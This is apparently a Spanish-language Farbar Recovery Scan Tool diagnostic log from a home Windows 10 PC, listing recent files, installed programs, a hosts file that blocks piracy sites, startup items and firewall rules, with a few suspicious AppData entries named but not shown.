2020-12-30 12:03 - 2020-08-31 22:46 - 000014259 _____ C:\ProgramData\DisplaySessionContainer41.log_backup1
2020-12-30 10:34 - 2020-08-31 19:19 - 000013933 _____ C:\ProgramData\DisplaySessionContainer40.log_backup1
2020-12-30 00:05 - 2020-07-03 17:07 - 000014466 _____ C:\ProgramData\DisplaySessionContainer39.log_backup1
2020-12-29 17:35 - 2020-05-13 22:27 - 000014249 _____ C:\ProgramData\DisplaySessionContainer38.log_backup1
2020-12-29 10:59 - 2020-05-13 19:32 - 000014272 _____ C:\ProgramData\DisplaySessionContainer37.log_backup1
2020-12-28 23:41 - 2020-05-12 22:25 - 000014249 _____ C:\ProgramData\DisplaySessionContainer36.log_backup1
2020-12-28 16:19 - 2020-05-12 14:00 - 000013933 _____ C:\ProgramData\DisplaySessionContainer35.log_backup1
2020-12-28 11:05 - 2020-05-12 09:11 - 000013935 _____ C:\ProgramData\DisplaySessionContainer34.log_backup1
2020-12-27 23:49 - 2020-05-11 22:27 - 000014269 _____ C:\ProgramData\DisplaySessionContainer33.log_backup1
2020-12-27 12:02 - 2020-05-10 22:28 - 000014255 _____ C:\ProgramData\DisplaySessionContainer32.log_backup1
2020-12-27 00:14 - 2020-05-10 19:16 - 000014274 _____ C:\ProgramData\DisplaySessionContainer31.log_backup1
2020-12-27 00:12 - 2020-05-10 12:03 - 000013578 _____ C:\ProgramData\DisplaySessionContainer30.log_backup1
2020-12-26 11:21 - 2020-05-10 10:56 - 000014265 _____ C:\ProgramData\DisplaySessionContainer29.log_backup1
2020-12-25 23:49 - 2020-05-09 23:02 - 000013931 _____ C:\ProgramData\DisplaySessionContainer28.log_backup1
2020-12-25 11:59 - 2020-05-09 19:04 - 000013898 _____ C:\ProgramData\DisplaySessionContainer27.log_backup1
2020-12-24 17:46 - 2020-05-09 00:46 - 000014219 _____ C:\ProgramData\DisplaySessionContainer26.log_backup1
2020-12-24 11:29 - 2020-04-05 22:47 - 000013941 _____ C:\ProgramData\DisplaySessionContainer25.log_backup1
2020-12-24 00:21 - 2020-04-05 13:01 - 000014137 _____ C:\ProgramData\DisplaySessionContainer24.log_backup1
2020-12-24 00:20 - 2020-01-26 10:03 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-12-23 19:39 - 2020-01-22 20:26 - 000000000 ____D C:\Users\javie\AppData\Local\Packages
2020-12-22 23:39 - 2020-04-04 23:21 - 000013826 _____ C:\ProgramData\DisplaySessionContainer23.log_backup1
2020-12-21 23:47 - 2020-04-04 13:53 - 000013938 _____ C:\ProgramData\DisplaySessionContainer22.log_backup1
2020-12-21 17:04 - 2020-04-04 09:51 - 000016454 _____ C:\ProgramData\DisplaySessionContainer21.log_backup1
2020-12-20 23:37 - 2020-04-04 00:02 - 000013936 _____ C:\ProgramData\DisplaySessionContainer20.log_backup1
2020-12-20 12:17 - 2020-04-03 18:12 - 000013944 _____ C:\ProgramData\DisplaySessionContainer19.log_backup1
2020-12-20 09:52 - 2020-03-26 23:35 - 000013965 _____ C:\ProgramData\DisplaySessionContainer18.log_backup1
2020-12-20 00:24 - 2020-03-26 14:28 - 000014577 _____ C:\ProgramData\DisplaySessionContainer17.log_backup1
2020-12-19 19:44 - 2020-07-07 17:36 - 000002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-12-19 17:56 - 2020-03-25 23:38 - 000014261 _____ C:\ProgramData\DisplaySessionContainer16.log_backup1
2020-12-19 17:45 - 2020-03-19 23:51 - 000014257 _____ C:\ProgramData\DisplaySessionContainer15.log_backup1
2020-12-19 15:52 - 2020-03-01 21:09 - 000000000 ____D C:\Users\javie\AppData\Local\ElevatedDiagnostics
2020-12-19 10:29 - 2020-03-10 16:29 - 000014565 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2020-12-19 00:15 - 2020-03-10 06:50 - 000014255 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2020-12-18 19:50 - 2020-03-10 00:04 - 000014146 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2020-12-17 23:42 - 2020-02-17 21:06 - 000014261 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2020-12-17 18:03 - 2020-08-07 09:29 - 000003380 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3503952492-1416054308-399170389-1001
2020-12-17 18:03 - 2020-01-22 20:33 - 000000000 ___RD C:\Users\javie\OneDrive
2020-12-17 18:02 - 2020-08-07 08:01 - 000002397 _____ C:\Users\javie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-12-16 23:33 - 2020-03-17 14:14 - 000014148 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2020-12-16 14:48 - 2020-02-21 12:32 - 000013933 _____ C:\ProgramData\DisplaySessionContainer9.log_backup1
2020-12-15 23:59 - 2020-02-20 23:47 - 000013931 _____ C:\ProgramData\DisplaySessionContainer8.log_backup1
2020-12-14 23:46 - 2020-02-20 06:58 - 000014272 _____ C:\ProgramData\DisplaySessionContainer7.log_backup1
2020-12-14 07:15 - 2020-02-19 23:27 - 000013943 _____ C:\ProgramData\DisplaySessionContainer6.log_backup1
2020-12-13 23:49 - 2020-02-19 22:49 - 000014570 _____ C:\ProgramData\DisplaySessionContainer5.log_backup1
2020-12-13 09:57 - 2020-02-19 20:17 - 000014576 _____ C:\ProgramData\DisplaySessionContainer4.log_backup1
2020-12-12 23:50 - 2020-02-18 23:49 - 000011384 _____ C:\ProgramData\DisplaySessionContainer3.log_backup1
2020-12-11 22:57 - 2020-08-07 09:01 - 001772862 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-12-11 22:57 - 2019-12-07 15:55 - 000789460 _____ C:\WINDOWS\system32\perfh00A.dat
2020-12-11 22:57 - 2019-12-07 15:55 - 000155812 _____ C:\WINDOWS\system32\perfc00A.dat
2020-12-11 20:50 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-12-11 20:50 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2020-12-11 20:50 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-12-11 20:50 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-12-11 20:49 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-12-11 20:49 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2020-12-11 20:49 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2020-12-11 18:49 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-12-10 07:30 - 2020-01-24 16:16 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-08 08:26 - 2020-04-08 13:39 - 000002299 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-12-05 19:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2020-12-04 19:17 - 2020-01-22 19:57 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2020-12-04 19:07 - 2020-08-07 09:17 - 000003620 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-12-04 19:07 - 2020-08-07 09:17 - 000003496 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
==================== Archivos en la raíz de algunos directorios ========
2020-12-17 15:09 - 2020-12-17 15:09 - 001183217 _____ () C:\Users\javie\AppData\Roaming\530354923
2020-05-14 13:13 - 2020-05-21 19:54 - 000000174 _____ () C:\Users\javie\AppData\Roaming\Lr.worker.dll.vbs
==================== SigCheck ============================
(No existe una corrección automática para los archivos que no pasan la verificación.)
==================== Final de FRST.txt ========================Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x64) Versión: 14-12-2020
Ejecutado por javier (03-01-2021 17:01:22)
Ejecutado desde C:\Users\javie\Desktop
Windows 10 Home Versión 2004 19041.685 (X64) (2020-08-07 08:18:53)
Modo de Inicio: Normal
==========================================================
==================== Cuentas: =============================
Administrador (S-1-5-21-3503952492-1416054308-399170389-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3503952492-1416054308-399170389-503 - Limited - Disabled)
Invitado (S-1-5-21-3503952492-1416054308-399170389-501 - Limited - Disabled)
javier (S-1-5-21-3503952492-1416054308-399170389-1001 - Administrator - Enabled) => C:\Users\javie
WDAGUtilityAccount (S-1-5-21-3503952492-1416054308-399170389-504 - Limited - Disabled)
==================== Centro de Seguridad ========================
(Si una entrada es incluida en el fixlist, será eliminada.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas instalados ======================
(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)
µTorrent (HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\uTorrent) (Version: 3.5.5.45838 - BitTorrent Inc.)
4K Video Downloader (HKLM\...\{A730612F-DC69-4EEC-AB92-0366346D9CCD}) (Version: 4.13.3.3870 - Open Media LLC)
Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe After Effects 2019 (HKLM-x32\...\AEFT_16_1) (Version: 16.1 - Adobe Systems Incorporated)
Adobe Premiere Pro 2020 (HKLM-x32\...\PPRO_14_0_1) (Version: 14.0.1 - Adobe Systems Incorporated)
Anki (HKLM-x32\...\Anki) (Version: 2.1.35 - )
ANT Drivers Installer x64 (HKLM\...\{16BA964D-698D-4663-8FA7-B9613DA7958B}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Battery Calibration (HKLM-x32\...\{634AC01E-49DB-4AD2-B87C-90D4DCC6AFA1}) (Version: 1.0.1609.1901 - Micro-Star International Co., Ltd.) Hidden
Battery Calibration (HKLM-x32\...\InstallShield_{634AC01E-49DB-4AD2-B87C-90D4DCC6AFA1}) (Version: 1.0.1609.1901 - Micro-Star International Co., Ltd.)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.74.1086 - AB Team, d.o.o.)
calibre (HKLM-x32\...\{87CE002F-33CD-4C3A-95CA-6EC98DC1A6C3}) (Version: 0.9.21 - Kovid Goyal)
CCleaner (HKLM\...\CCleaner) (Version: 5.75 - Piriform)
Dragon Center (HKLM-x32\...\{C65B26BC-5A6F-4135-9678-55A877655471}) (Version: 1.2.1705.3101 - Micro-Star International Co., Ltd.) Hidden
Dragon Center (HKLM-x32\...\InstallShield_{C65B26BC-5A6F-4135-9678-55A877655471}) (Version: 1.2.1705.3101 - Micro-Star International Co., Ltd.)
Elevated Installer (HKLM-x32\...\{877496C2-70B0-42F1-835A-FAFE2CF0199C}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
Espagne OSM (HKLM-x32\...\Espagne OSM) (Version: - )
Garmin BaseCamp (HKLM-x32\...\{9b6e1420-2b69-4974-a25f-ba67399695fd}) (Version: 4.7.3.0 - Garmin Ltd or its subsidiaries)
Garmin BaseCamp (HKLM-x32\...\{F71A87C2-FEF5-450A-A601-DCC1A9E23DAF}) (Version: 4.7.3.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express (HKLM-x32\...\{235f2ee5-7383-44df-a298-01221caa5532}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{E944FA32-8BCF-474F-BFB2-D1EF24555873}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.88 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Help Desk (HKLM-x32\...\{7E8181AF-9679-49B3-B133-C265709B6927}) (Version: 1.0.1610.3101 - Micro-Star International Co., Ltd.) Hidden
Help Desk (HKLM-x32\...\InstallShield_{7E8181AF-9679-49B3-B133-C265709B6927}) (Version: 1.0.1610.3101 - Micro-Star International Co., Ltd.)
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 27.20.100.7989 - Intel Corporation)
ITN Converter 1.94 (HKLM-x32\...\ITN Converter_is1) (Version: 1.94 - Benichou Software)
League of Legends (HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\Riot Game league_of_legends.live) (Version: - Riot Games, Inc)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.66 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft OneDrive (HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\Teams) (Version: 1.3.00.21759 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{143E35D3-F0A4-4E90-96C9-B1B72F11343A}) (Version: 2.70.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.23.27820 (HKLM-x32\...\{45231ab4-69fd-486a-859d-7a59fcd11013}) (Version: 14.23.27820.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
MPC-HC 1.7.13 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.13 - MPC-HC Team)
MSI Remind Manager (HKLM-x32\...\{3E23F267-3E35-40F9-B6BF-BC034D214717}) (Version: 1.0.1608.1001 - Micro-Star International Co., Ltd.) Hidden
MSI Remind Manager (HKLM-x32\...\InstallShield_{3E23F267-3E35-40F9-B6BF-BC034D214717}) (Version: 1.0.1608.1001 - Micro-Star International Co., Ltd.)
NVIDIA Controlador de gráficos 445.87 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 445.87 - NVIDIA Corporation)
NVIDIA Software del sistema PhysX 9.19.0218 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.19.0218 - NVIDIA Corporation)
OSM generic routable(ESP) (HKLM-x32\...\OSM generic routable(ESP)) (Version: - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8328 - Realtek Semiconductor Corp.)
TimeLeft (HKLM-x32\...\TIMELEFT3_is1) (Version: 3.56 - NesterSoft Inc.)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
WinRAR 5.71 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.71.0 - win.rar GmbH)
Zoom (HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\ZoomUMX) (Version: 5.0 - Zoom Video Communications, Inc.)
Packages:
=========
Bubble Witch 3 Saga -> C:\Program Files\WindowsApps\king.com.BubbleWitch3Saga_7.1.17.0_x86__kgqvnymyfvs32 [2020-12-17] (king.com)
iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa [2020-11-18] (Apple Inc.) [Startup Task]
Killer Control Center -> C:\Program Files\WindowsApps\RivetNetworks.KillerControlCenter_2.2.3259.0_x64__rh07ty8m5nkag [2020-08-07] (Rivet Networks LLC) [Startup Task]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-04-08] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-04-08] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.10142.0_x64__8wekyb3d8bbwe [2020-10-24] (Microsoft Studios) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.959.0_x64__56jybvy8sckqj [2020-11-27] (NVIDIA Corp.)
SynMsiDApp -> C:\Program Files\WindowsApps\SynapticsIncorporated.SynMsiDApp_19005.31005.0.0_x64__807d65c4rvak2 [2020-04-08] (Synaptics Incorporated)
==================== Personalizado CLSID (Lista blanca): ==============
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
CustomCLSID: HKU\S-1-5-21-3503952492-1416054308-399170389-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\javie\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20130.1\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3503952492-1416054308-399170389-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\javie\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20130.1\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [6722448 2010-03-25] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Ningún archivo
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_bdd37d808cfdf045\igfxDTCM.dll [2020-06-15] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_d89a89f9da6bfb4c\nvshext.dll [2020-04-11] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-04-27] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Lista blanca) ====================
==================== Accesos directos & WMI ========================
(Las entradas pueden ser listadas para ser restauradas o eliminadas.)
Shortcut: C:\Users\javie\AppData\Roaming\Microsoft\Windows\Start Menu\MEE2.lnk -> C:\Users\javie\macmillan\run_macmillan.bat ()
Shortcut: C:\Users\javie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\macmillan\MEE2.lnk -> C:\Users\javie\macmillan\run_macmillan.bat ()
Shortcut: C:\Users\javie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\macmillan\Uninstall MEE2.lnk -> C:\Users\javie\macmillan\uninstall_macmillan.bat ()
==================== Módulos cargados (Lista blanca) =============
2015-06-11 19:35 - 2015-06-11 19:35 - 000047816 _____ (MICRO-STAR INTERNATIONAL CO., LTD -> www.internals.com) [Archivo no firmado] C:\Program Files (x86)\MSI\Dragon Center\WinIo64.dll
==================== Alternate Data Streams (Lista blanca) ========
==================== Modo Seguro (Lista blanca) ==================
==================== Asociación (Lista blanca) =================
==================== Internet Explorer (Lista blanca) ==========
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation -> Microsoft Corporation)
Filter: text/xml - Sin valor CLSID
==================== Hosts contenido: =========================
(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)
2019-03-19 05:49 - 2021-01-02 16:13 - 000159767 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 localhost
127.0.0.1 thepiratebay.org
127.0.0.1 ukpiratebay.net
127.0.0.1 pirateproxy.surf
127.0.0.1 pirateproxy.ink
127.0.0.1 openpirate.org
127.0.0.1 mypiratebay.club
127.0.0.1 openpirate.cc
127.0.0.1 mypiratebay.net
127.0.0.1 mypiratebay.wtf
127.0.0.1 tpb.cool
127.0.0.1 piratebay.icu
127.0.0.1 tpb.red
127.0.0.1 piratebay.life
127.0.0.1 mypiratebay.fun
127.0.0.1 mypiratebay.co
127.0.0.1 piratebay.tech
127.0.0.1 mypiratebay.life
127.0.0.1 mypiratebay.me
127.0.0.1 mypiratebay.best
127.0.0.1 tpb.bike
127.0.0.1 tpb.email
127.0.0.1 tpb.guru
127.0.0.1 thepiratebay3.to
127.0.0.1 pirate-bay.net
127.0.0.1 thepiratebay.zone
127.0.0.1 pirateproxy.live
127.0.0.1 thepiratebay10.org
127.0.0.1 uspiratebay.net
127.0.0.1 piratebay.live
Hay 5222 más lineas.
==================== Otras Áreas ===========================
(Actualmente no existe una corrección automática para esta sección.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Intel\Shared Libraries\redist\intel64\compiler;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\Calibre2\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 212.166.210.80 - 212.166.132.104
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Firewall de Windows está habilitado.
==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==
(Si una entrada es incluida en el fixlist, será eliminada.)
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\StartupApproved\StartupFolder: => "Lr.worker.dll.lnk"
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\StartupApproved\Run: => "utweb"
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\StartupApproved\Run: => "CCXProcess"
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams"
HKU\S-1-5-21-3503952492-1416054308-399170389-1001\...\StartupApproved\Run: => "GarminExpress"
==================== Reglas de firewall (Lista blanca) ================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
FirewallRules: [UDP Query User{50B30921-72E4-49C9-8001-BBE200CB77DE}C:\users\javie\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\javie\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{992D9AA8-8951-4092-B8D4-1549CF262AA4}C:\users\javie\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\javie\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{184FD913-AE9B-4CF2-824D-983A6A6F02D1}C:\users\javie\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\javie\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [TCP Query User{12743EA5-B4CB-4AEF-BEA4-0C9E96AC37DD}C:\users\javie\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\javie\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{E31612E1-81A9-40F5-B561-AB34F6EB0691}] => (Allow) C:\Users\javie\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [UDP Query User{07D9758B-045D-4AAB-B568-7FF05E5CDD17}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{D62C76AD-A054-4D99-8FC7-BE8D5C363DDF}C:\program files (x86)\google\chrome\application\chrome.exe] => (Block) C:\program files (x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{C00C1583-2174-441F-943F-B66723249DD4}C:\users\javie\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\javie\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{9E72E381-F8D6-4995-B6E1-504E286949A4}C:\users\javie\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\javie\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [TCP Query User{9023F02C-195E-4019-A037-554F55EBE2E5}C:\users\javie\macmillan\jre6\bin\javaw.exe] => (Allow) C:\users\javie\macmillan\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{B3E7F7C5-930D-4D08-A670-86356D629BF3}C:\users\javie\macmillan\jre6\bin\javaw.exe] => (Allow) C:\users\javie\macmillan\jre6\bin\javaw.exe
FirewallRules: [{237F0E35-4F74-4B6F-8E22-CDFE7D5958DE}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CF23DD16-4856-4EC0-BBFC-B71983D4473A}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12110.26.53016.0_x64__nzyj5cx40ttqa\iTunes.exe (Apple Inc. -> Apple Inc.)
